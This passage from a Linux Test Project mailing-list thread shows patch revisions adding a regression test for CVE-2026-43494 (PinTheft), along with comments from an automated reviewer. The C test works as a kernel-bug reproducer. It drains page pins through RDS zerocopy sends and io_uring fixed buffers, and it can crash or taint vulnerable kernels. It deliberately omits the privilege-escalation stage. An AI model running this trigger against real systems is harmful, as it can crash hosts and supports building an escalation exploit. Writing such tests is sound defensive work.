+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
@ 2026-05-23 13:30 ` linuxtestproject.agent
0 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 13:30 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, May 23, 2026, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
[...]
> +/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
> +struct clone_buffers_arg {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
This struct is a kernel API type and belongs in `include/lapi/io_uring.h`
alongside `IORING_REGISTER_CLONE_BUFFERS`, following the existing pattern
of `struct io_uring_files_update` living next to `IORING_REGISTER_FILES_UPDATE`.
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +#define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
The value 30 needs a cross-reference to the upstream kernel uapi header
(`include/uapi/linux/io_uring.h`) in a comment or at least a verification
note. The lapi file has no other numbered register opcodes above 10, so
there is nothing here to corroborate the value. Please confirm against the
kernel source — the latest stable (7.1) has this defined; a quick grep of
`linux/io_uring.h` is enough.
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
> + if (errno == ENOMEM)
> + tst_brk(TCONF, "Not enough memory to register io_uring buffer");
ENOMEM is a resource exhaustion error, not a configuration or feature
availability issue. Use `TBROK | TERRNO` here (or simply drop the special
case and let the fallthrough handle it), not `TCONF`.
[...]
> +#define CLEANUP_WAIT_SECS 30
The test unconditionally sleeps 30 s on every non-vulnerable pass. No
`.timeout` is set; the default 300 s window is large enough, but a
`.timeout = 60` (or similar) would make the intent explicit and prevent
runtest timeouts if setup overhead is higher than expected.
---
Note:
Our agent completed the review of the patch. The full review can be
found at: https://github.com/linux-test-project/ltp/pull/1726
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v3] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
@ 2026-05-23 15:10 ` Sebastian Chlad
2026-05-23 16:17 ` [LTP] " linuxtestproject.agent
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
3 siblings, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 15:10 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v3: (follow-up on the LTP-AI suggestions)
- Move struct clone_buffers_arg to lapi/io_uring.h as io_uring_clone_buffers_arg
- Add source reference comment for IORING_REGISTER_CLONE_BUFFERS value
- Add RDS_CMSG_ZCOPY_COOKIE fallback for older userspace headers
- Fix ENOMEM case: use TBROK instead of TCONF for IORING_REGISTER_BUFFERS
- Add .timeout = 60 to account for 30s cleanup wait
include/lapi/io_uring.h | 14 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 425 ++++++++++++++++++
3 files changed, 440 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..6f13b8466 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,20 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG
+struct io_uring_clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..e7c05cb43
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,425 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+#define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
@ 2026-05-23 16:17 ` linuxtestproject.agent
0 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 16:17 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026 17:10:45 +0200, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
> Author: Sebastian Chlad <sebastianchlad@gmail.com>
> Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
Author email and Signed-off-by email don't match. The DCO requires the
SOB identity to match the commit author. Please rebase with a consistent
identity (likely the corporate address throughout, or vice versa).
[...]
> +/* Argument for IORING_REGISTER_CLONE_BUFFERS */
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG
> +struct io_uring_clone_buffers_arg {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
The HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG guard is never set because
there is no corresponding AC_CHECK_TYPES entry in configure.ac. See e.g.
the struct futex_waitv pattern:
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
Without it the guard is dead and on a kernel that defines this struct
under the same name you'll get a redefinition error. Please add:
AC_CHECK_TYPES([struct io_uring_clone_buffers_arg],,,
[#include <linux/io_uring.h>])
Also: the upstream kernel uapi defines this as struct io_uring_clone_buffers
(no _arg suffix). If that is still the name in 7.1, the struct name and
guard in lapi need to match (io_uring_clone_buffers /
HAVE_STRUCT_IO_URING_CLONE_BUFFERS) so the fallback fires correctly on
older headers and doesn't shadow the system definition on newer ones. ⚠️
Please verify against the 7.1 uapi header.
[...]
> +#define GUP_PIN_COUNTING_BIAS 1024
> +
> +
> +static int ring_fd1 = -1;
Double blank line. One blank line between a macro block and the variable
declarations is enough.
[...]
---
Note:
Our agent completed the review of the patch. The full review can be
found at: (not set)
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
```
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
` (2 preceding siblings ...)
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
@ 2026-05-23 16:57 ` Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
` (2 more replies)
3 siblings, 3 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 16:57 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v4: (fixing pointers listed by AI LTP)
- Fix double blank line
- Correct HAVE_STRUCT_IO_URING_CLONE_BUFFERS
configure.ac | 1 +
include/lapi/io_uring.h | 14 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 424 ++++++++++++++++++
4 files changed, 440 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/configure.ac b/configure.ac
index 0653d7793..3a1283ac3 100644
--- a/configure.ac
+++ b/configure.ac
@@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
+AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
AC_CHECK_TYPES([struct mount_attr],,,[
#ifdef HAVE_MOUNT_SETATTR
# include <sys/mount.h>
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..5c6f9a785 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,20 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
+struct io_uring_clone_buffers {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
